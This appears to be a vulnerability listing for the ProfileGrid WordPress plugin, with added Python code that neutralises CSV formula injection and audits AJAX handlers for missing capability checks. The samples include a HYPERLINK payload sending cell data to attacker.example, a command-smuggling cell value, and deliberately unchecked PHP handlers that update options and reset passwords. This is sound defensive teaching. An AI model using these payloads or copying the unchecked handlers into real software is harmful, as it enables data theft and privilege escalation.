CVE-2023-3713 – ProfileGrid <= 5.5.1 - Authenticated (Subscriber+) Arbitrary Option Update
https://notcve.org/view.php?id=CVE-2023-3713
The ProfileGrid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'profile_magic_check_smtp_connection' function in versions up to, and including, 5.5.1. This makes it possible for authenticated attackers with subscriber-level permissions or above to update site options arbitrarily, which can be used to achieve privilege escalation. • https://plugins.trac.wordpress.org/browser/profilegrid-user-profiles-groups-and-communities/tags/5.4.8/admin/class-profile-magic-admin.php#L599 https://plugins.trac.wordpress.org/changeset/2938904/profilegrid-user-profiles-groups-and-communities#file0 https://www.wordfence.com/threat-intel/vulnerabilities/id/473ba791-af99-4aae-99cb-ccf220e443e7?source=cve • CWE-862: Missing Authorization •
CVE-2023-0940 – ProfileGrid < 5.3.1 - Subscriber+ Arbitrary Password Reset
https://notcve.org/view.php?id=CVE-2023-0940
The ProfileGrid WordPress plugin before 5.3.1 exposes an AJAX endpoint for resetting a user password, the pm_reset_user_password function, without a proper authorization check; versions up to, and including, 5.3.0 are affected. This allows an authenticated user with low privileges, such as a subscriber, to change the password of any account, including Administrator accounts. • https://wpscan.com/vulnerability/56744f72-2d48-4f42-8195-24b4dd951bb5 • CWE-862: Missing Authorization CWE-863: Incorrect Authorization •
CVE-2022-41791 – WordPress ProfileGrid plugin <= 5.1.6 - Auth. CSV Injection vulnerability
https://notcve.org/view.php?id=CVE-2022-41791
Authenticated (subscriber+) CSV Injection vulnerability in the ProfileGrid plugin <= 5.1.6 on WordPress. The plugin is vulnerable to CSV Injection in versions up to, and including, 5.1.6, via the 'pm_get_csv_single_user_row' function. This allows subscriber-level attackers to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened in a spreadsheet application on a local system with a vulnerable configuration. • https://patchstack.com/database/vulnerability/profilegrid-user-profiles-groups-and-communities/wordpress-profilegrid-plugin-5-1-6-csv-injection-vulnerability?_s_id=cve • CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') CWE-1236: Improper Neutralization of Formula Elements in a CSV File •
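The defensive transform that an export routine such as 'pm_get_csv_single_user_row' has to apply, as an added example that is not ProfileGrid code: every user-controlled cell that begins with a formula trigger is stored as text, and a checker a tester can run over an exported file reports the cells a spreadsheet would still evaluate. The user records, the field names and the payloads below are constructed for the example.

```python
"""Neutralise spreadsheet formula injection (CWE-1236) in a CSV export.

Added example, not ProfileGrid code. export_rows() is the hardened export
(with neutralise=False it behaves like a naive export that writes user
input verbatim), and formula_cells() is the checker.
"""
import csv
import io

# A cell whose first character is one of these is parsed as a formula by
# Excel and LibreOffice Calc. Tab and carriage return are included because
# some importers strip leading whitespace before deciding what a cell is.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value):
    """True for a non-empty string that a spreadsheet would treat as a formula."""
    return isinstance(value, str) and value[:1] in FORMULA_TRIGGERS


def neutralise_cell(value):
    """Prefix a formula-like string with a single quote so it is stored as text.

    Numbers are left alone: a Python int such as -5 is a legitimate negative
    number, whereas the string "-5" came from user input and is neutralised.
    """
    if is_formula_like(value):
        return "'" + value
    return value


def export_rows(rows, fieldnames, neutralise=True):
    """Serialise a list of dicts to CSV text, neutralising every cell by default."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, quoting=csv.QUOTE_ALL,
                            lineterminator="\n")
    writer.writeheader()
    for row in rows:
        cells = {name: row.get(name, "") for name in fieldnames}
        if neutralise:
            cells = {name: neutralise_cell(value) for name, value in cells.items()}
        writer.writerow(cells)
    return buf.getvalue()


def formula_cells(csv_text):
    """Return (line_number, column, value) for each cell a spreadsheet would evaluate.

    Line numbers count the header as line 1, so the first data row is line 2.
    """
    hits = []
    for line_number, row in enumerate(csv.DictReader(io.StringIO(csv_text)), start=2):
        for column, value in row.items():
            if is_formula_like(value):
                hits.append((line_number, column, value))
    return hits


# Constructed sample of what a profile export might contain. The second user
# carries a HYPERLINK exfiltration payload in the display name and a
# leading-minus payload in the bio; neither is taken from a real site.
SAMPLE_USERS = [
    {"username": "alice", "display_name": "Alice", "bio": "Hello"},
    {"username": "mallory",
     "display_name": '=HYPERLINK("http://attacker.example/?"&A1,"open me")',
     "bio": "-1+1|cmd"},
]
FIELDS = ["username", "display_name", "bio"]

if __name__ == "__main__":
    print("naive export flags:", formula_cells(export_rows(SAMPLE_USERS, FIELDS, neutralise=False)))
    print("hardened export flags:", formula_cells(export_rows(SAMPLE_USERS, FIELDS)))
    print(export_rows(SAMPLE_USERS, FIELDS))
```

The single-quote prefix is the portable mitigation; some guidance additionally prefixes a tab so the quote is not shown as literal text, but a tab is itself one of the trigger characters in some importers, so this example keeps the quote alone. Quoting with csv.QUOTE_ALL does not help on its own: a quoted cell that begins with '=' is still evaluated once the file is opened.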
CVE-2022-36352 – WordPress ProfileGrid Plugin <= 5.0.3 is vulnerable to Broken Access Control
https://notcve.org/view.php?id=CVE-2022-36352
Missing Authorization vulnerability in ProfileGrid – User Profiles, Memberships, Groups and Communities. This issue affects versions from n/a through 5.0.3. The plugin is vulnerable to authorization bypass due to a missing capability check when accessing messages in versions up to, and including, 5.0.3. This makes it possible for authenticated attackers with subscriber-level permissions and above to read and edit arbitrary messages. • https://patchstack.com/database/vulnerability/profilegrid-user-profiles-groups-and-communities/wordpress-profilegrid-plugin-5-0-3-broken-access-control-vulnerability?_s_id=cve • CWE-862: Missing Authorization •
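CVE-2023-3713, CVE-2023-0940 and CVE-2022-36352 are all the same bug class: a WordPress 'wp_ajax_{action}' hook fires for every logged-in user regardless of role, so a handler that does privileged work without its own current_user_can() check is reachable by a subscriber. The script below, an added example and not ProfileGrid code, is the triage pass a reviewer would run over a plugin's PHP source: it finds each wp_ajax_ registration, locates the handler function, and reports whether the body contains a capability check and a nonce check. The PHP it runs on is a constructed sample with hypothetical names (demo_update_setting, reset_password, demo_safe_update); it is not the plugin's code.

```python
"""Static audit of WordPress AJAX handlers for missing authorization (CWE-862).

Added example, not ProfileGrid code. The PHP in SAMPLE_PLUGIN_SOURCE is
constructed for this example.
"""
import re

# add_action( 'wp_ajax_X', 'func' ) and add_action( 'wp_ajax_X', array( $this, 'method' ) ),
# including the short [ $this, 'method' ] array syntax and wp_ajax_nopriv_ hooks.
AJAX_HOOK_RE = re.compile(
    r"""add_action\(\s*['"]wp_ajax_(?P<nopriv>nopriv_)?(?P<action>\w+)['"]\s*,\s*"""
    r"""(?:(?:array\(|\[)\s*\$this\s*,\s*['"](?P<method>\w+)['"]\s*[\)\]]|['"](?P<func>\w+)['"])"""
)
CAPABILITY_CALLS = ("current_user_can(", "is_super_admin(")
NONCE_CALLS = ("check_ajax_referer(", "wp_verify_nonce(")


def extract_function_body(source, name):
    """Return the text of `function name(...) { ... }` by brace matching, or None."""
    m = re.search(r"function\s+" + re.escape(name) + r"\b\s*\([^)]*\)\s*\{", source)
    if m is None:
        return None
    start = m.end() - 1  # index of the opening brace
    depth = 0
    for i in range(start, len(source)):
        if source[i] == "{":
            depth += 1
        elif source[i] == "}":
            depth -= 1
            if depth == 0:
                return source[start:i + 1]
    return None


def audit_ajax_handlers(source):
    """One finding per wp_ajax_ hook: which checks the handler contains and a verdict."""
    findings = []
    for m in AJAX_HOOK_RE.finditer(source):
        handler = m.group("method") or m.group("func")
        body = extract_function_body(source, handler)
        finding = {
            "action": m.group("action"),
            "handler": handler,
            "nopriv": m.group("nopriv") is not None,
            "has_capability_check": body is not None and any(c in body for c in CAPABILITY_CALLS),
            "has_nonce_check": body is not None and any(c in body for c in NONCE_CALLS),
        }
        if body is None:
            finding["verdict"] = "handler not found in source"
        elif finding["nopriv"]:
            finding["verdict"] = "unauthenticated hook: review manually"
        elif not finding["has_capability_check"]:
            # A nonce only proves the request came from a page the user could load;
            # it says nothing about whether the user may perform the action.
            finding["verdict"] = ("missing capability check (nonce only)"
                                  if finding["has_nonce_check"]
                                  else "missing capability check and nonce")
        elif not finding["has_nonce_check"]:
            finding["verdict"] = "missing nonce (CSRF)"
        else:
            finding["verdict"] = "ok"
        findings.append(finding)
    return findings


# Constructed sample plugin source: one handler with no checks, one with a
# nonce but no capability check, one with both. Not ProfileGrid code.
SAMPLE_PLUGIN_SOURCE = r"""<?php
add_action( 'wp_ajax_demo_update_setting', 'demo_update_setting' );
add_action( 'wp_ajax_demo_safe_update', 'demo_safe_update' );

// Any logged-in user, subscriber included, can reach this and write an option.
function demo_update_setting() {
    update_option( sanitize_text_field( $_POST['name'] ), $_POST['value'] );
    wp_send_json_success();
}

function demo_safe_update() {
    check_ajax_referer( 'demo_nonce', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    update_option( 'demo_setting', sanitize_text_field( $_POST['value'] ) );
    wp_send_json_success();
}

class Demo_Admin {
    public function __construct() {
        add_action( 'wp_ajax_demo_reset_password', array( $this, 'reset_password' ) );
    }
    // Nonce only: a subscriber can read the nonce from any page that prints it.
    public function reset_password() {
        check_ajax_referer( 'demo_nonce', 'nonce' );
        wp_set_password( $_POST['password'], absint( $_POST['user_id'] ) );
        wp_send_json_success();
    }
}
"""

if __name__ == "__main__":
    for f in audit_ajax_handlers(SAMPLE_PLUGIN_SOURCE):
        print(f"{f['action']:<22} {f['handler']:<20} {f['verdict']}")
```

The check is textual, so it is a triage aid and not proof: a current_user_can() call guarding the wrong capability, or sitting in a branch the request can skip, still counts as present. Confirm each "missing capability check" finding dynamically by sending the request to admin-ajax.php as a freshly registered subscriber, and treat "nonce only" findings as real authorization bugs, since the nonce is obtainable by the same low-privileged account.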
CVE-2022-3578 – ProfileGrid < 5.1.1 - Reflected Cross-Site Scripting
https://notcve.org/view.php?id=CVE-2022-3578
The ProfileGrid WordPress plugin before 5.1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to Reflected Cross-Site Scripting. Specifically, versions up to, and including, 5.1.0 reflect the 'id' parameter with insufficient input sanitization and output escaping, which makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute if they can trick a user into performing an action such as clicking on a crafted link. • https://wpscan.com/vulnerability/17596b0e-ff45-4d0c-8e57-a31101e30345 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •